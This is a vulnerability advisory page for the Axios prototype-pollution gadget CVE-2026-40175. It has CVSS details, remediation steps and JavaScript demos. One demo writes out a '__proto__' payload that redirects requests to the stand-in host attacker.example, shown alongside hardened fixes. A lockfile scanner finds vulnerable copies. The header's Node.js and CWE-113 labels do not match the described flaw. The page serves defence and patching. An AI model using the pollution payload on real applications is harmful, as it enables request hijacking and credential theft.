
Node.js CVE-2026-40175

EUVD-2026-21573 | Severity: MEDIUM (CVSS 3.1 base score 4.8)
Weakness: HTTP Response Splitting (CWE-113)
Published 2026-04-10 | Source: GitHub_M | Advisory: GHSA-fvcv-3m26-pcqx

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: Low
Availability: None

Lifecycle Timeline (6 events)

Severity changed (NVD, Apr 16, 2026 19:22): CRITICAL → MEDIUM
CVSS changed (NVD, Apr 16, 2026 19:22): 10.0 (CRITICAL) → 4.8 (MEDIUM)
Patch released (nvd, Apr 11, 2026 02:30): patch available
EUVD ID assigned (euvd, Apr 10, 2026 20:15): EUVD-2026-21573
Analysis generated (vuln.today, Apr 10, 2026 20:15)
CVE published (nvd, Apr 10, 2026 19:23): initial score CRITICAL 10.0

Blast Radius

Ecosystem impact (transitive dependency graph, resolved by vuln.today to a depth of 4 paths):
  • 273 npm packages depend on axios (189 direct, 84 indirect)

Ecosystem-wide dependent count for version 1.0.0.

Description (NVD)

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0.

Analysis (AI)

Axios versions prior to 1.15.0 act as a gadget: a prototype pollution bug in some other dependency of the same application can be escalated through Axios into remote code execution or, on AWS, into compromise of instance credentials via an IMDSv2 bypass. Axios itself is not the entry point. The attacker first needs a reachable prototype pollution sink elsewhere in the application, which is why NVD's vector carries Attack Complexity: High and rates confidentiality and integrity impact as Low (4.8), down from the 10.0 assigned at publication. Treat it as a high-value escalation step in any application that may already contain a pollution primitive, not as a standalone unauthenticated RCE. …
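The chain sketched in the description and analysis above is generic enough to show in miniature. The JavaScript below is an added illustration, not Axios code and not the advisory's actual gadget: `naiveMerge` stands in for the prototype pollution bug in some other dependency, `buildRequestNaive` stands in for an HTTP client that resolves unset options through plain property reads, and the attacker-controlled JSON, the host names and the option names (`proxy`, `headers`) are all constructed for this example. The hardened variants show the two fixes that break the chain at either end: refusing prototype keys in the merge, and reading only own properties in the client.

```javascript
'use strict';

// Constructed attacker input (not from any real request). The "__proto__" key
// is what turns naiveMerge into a write to Object.prototype.
const ATTACKER_JSON =
  '{"theme":"dark","__proto__":{"proxy":"http://attacker.example:8080","headers":{"X-Injected":"1"}}}';

// (1) Vulnerable primitive: a recursive merge that trusts key names from parsed JSON.
//     For key "__proto__", target[key] resolves to Object.prototype and the
//     recursion writes the attacker's values onto it.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened primitive: skip the keys that reach the prototype chain and only
// create own, null-prototype containers for nested objects.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (!Object.hasOwn(target, key) || target[key] === null || typeof target[key] !== 'object') {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// (2) Gadget: a client that resolves request settings with plain property reads.
//     Options the caller never set fall through to Object.prototype, so a
//     polluted `proxy` redirects the connection to the attacker's host and a
//     polluted `headers` object injects headers into the request.
function buildRequestNaive(options) {
  const url = new URL(options.url);
  const proxy = options.proxy ? new URL(options.proxy) : null;
  const headers = Object.assign({ Host: url.host }, options.headers);
  return { connectTo: proxy ? proxy.host : url.host, path: proxy ? url.href : url.pathname, headers };
}

// Hardened client: read only own properties of the options object and build the
// header map on a null prototype, so inherited values never reach the wire.
function buildRequestHardened(options) {
  const own = (k) => (Object.hasOwn(options, k) ? options[k] : undefined);
  const url = new URL(own('url'));
  const proxy = own('proxy') ? new URL(own('proxy')) : null;
  const headers = Object.assign(Object.create(null), { Host: url.host });
  const userHeaders = own('headers');
  if (userHeaders) for (const k of Object.keys(userHeaders)) headers[k] = userHeaders[k];
  return { connectTo: proxy ? proxy.host : url.host, path: proxy ? url.href : url.pathname, headers };
}

// Runs the chain end to end: pollute via the merge, then issue the same
// internal request through both clients. Cleans the prototype afterwards so
// nothing else in the process inherits the injected values.
function runScenario() {
  const request = { url: 'http://api.internal.example/v1/orders' };   // constructed internal target
  const settings = naiveMerge({}, JSON.parse(ATTACKER_JSON));          // pollution happens here
  const polluted = Object.prototype.proxy !== undefined;
  const naive = buildRequestNaive(request);
  const hardened = buildRequestHardened(request);
  delete Object.prototype.proxy;
  delete Object.prototype.headers;
  return { polluted, theme: settings.theme, naive, hardened };
}

console.log(JSON.stringify(runScenario(), null, 2));
```

The naive client ends up connecting to `attacker.example:8080` with an `X-Injected` header even though the caller asked for an internal API, which is the shape of every prototype-pollution gadget: nothing in the client is itself buggy, it just trusts inherited properties. Either fix alone breaks this particular chain; the client-side one is the only defence against pollution bugs in dependencies you do not control.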


Remediation (AI)

Within 24 hours: inventory every application and dependency tree that resolves Axios at a version prior to 1.15.0, across development, staging and production, including transitive copies nested under other packages' node_modules. Within 7 days: upgrade Axios to 1.15.0 or later everywhere. If an upgrade is blocked by compatibility issues, reduce the blast radius in the meantime: restrict the affected service's outbound network access so a hijacked request cannot reach arbitrary hosts, and on EC2 require IMDSv2 (HttpTokens=required, with a PUT response hop limit of 1) so the IMDSv1 path is disabled. Note that the metadata hardening is defence in depth against credential theft and does not by itself close the gadget; the root cause is the reachable prototype pollution primitive, and the only complete fix is the upgrade. …
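A first-pass inventory over a lockfile, as an added example (not vuln.today's or the Axios project's tooling): it walks a constructed package-lock.json (lockfileVersion 3), finds every installed copy of axios including copies nested under other packages, and flags those below the fixed version. All package names other than axios, and every version in the sample lock, are made up for the example.

```javascript
'use strict';

// Constructed lockfile for illustration (lockfileVersion 3 layout: one entry
// per installed path). Nested copies live under another package's node_modules.
const SAMPLE_LOCK = {
  name: 'example-service',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-service', dependencies: { axios: '^1.6.0', 'legacy-sdk': '2.0.0' } },
    'node_modules/axios': { version: '1.6.8' },
    'node_modules/legacy-sdk': { version: '2.0.0', dependencies: { axios: '0.21.4' } },
    'node_modules/legacy-sdk/node_modules/axios': { version: '0.21.4' },
    'node_modules/other-tool': { version: '3.1.0', dev: true },
    'node_modules/other-tool/node_modules/axios': { version: '1.15.0' },
  },
};

const FIXED_VERSION = '1.15.0'; // fixed release named in the advisory

// Segment-wise numeric comparison. A plain string compare ranks "1.9.9" above
// "1.15.0" and is a common way inventories miss vulnerable copies.
// Returns -1, 0 or 1. A pre-release of a version sorts before its release.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  const preA = a.includes('-');
  const preB = b.includes('-');
  if (preA !== preB) return preA ? -1 : 1;
  return 0;
}

// Finds every installed copy of pkgName whose version is below fixedVersion.
// `requiredBy` is the package whose node_modules directory holds the copy
// ("(root project)" for the hoisted top-level install).
function findVulnerableCopies(lock, pkgName, fixedVersion) {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const isCopy = path === `node_modules/${pkgName}` || path.endsWith(`/node_modules/${pkgName}`);
    if (!isCopy || !entry.version) continue;
    if (compareVersions(entry.version, fixedVersion) >= 0) continue;
    const idx = path.lastIndexOf('/node_modules/');
    const requiredBy = idx === -1 ? '(root project)' : path.slice(0, idx).split('node_modules/').pop();
    hits.push({ path, version: entry.version, requiredBy, dev: Boolean(entry.dev) });
  }
  return hits.sort((x, y) => x.path.localeCompare(y.path));
}

// Human-readable report; returns the lines so callers can log or assert on them.
function report(lock, pkgName, fixedVersion) {
  const hits = findVulnerableCopies(lock, pkgName, fixedVersion);
  if (hits.length === 0) return [`${lock.name}: no copies of ${pkgName} below ${fixedVersion}`];
  return hits.map((h) =>
    `${lock.name}: ${pkgName}@${h.version} at ${h.path} (required by ${h.requiredBy}${h.dev ? ', dev' : ''}) < ${fixedVersion}`,
  );
}

console.log(report(SAMPLE_LOCK, 'axios', FIXED_VERSION).join('\n'));
```

On a real checkout `npm ls axios --all` gives the same picture from the installed tree; parsing the lock directly is useful in CI where node_modules is absent, and it makes the two classic misses explicit: lexicographic version comparison, and the nested copy pinned by an older SDK that an upgrade of the top-level dependency leaves untouched.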


Vendor Status


CVE-2026-40175 vulnerability details – vuln.today
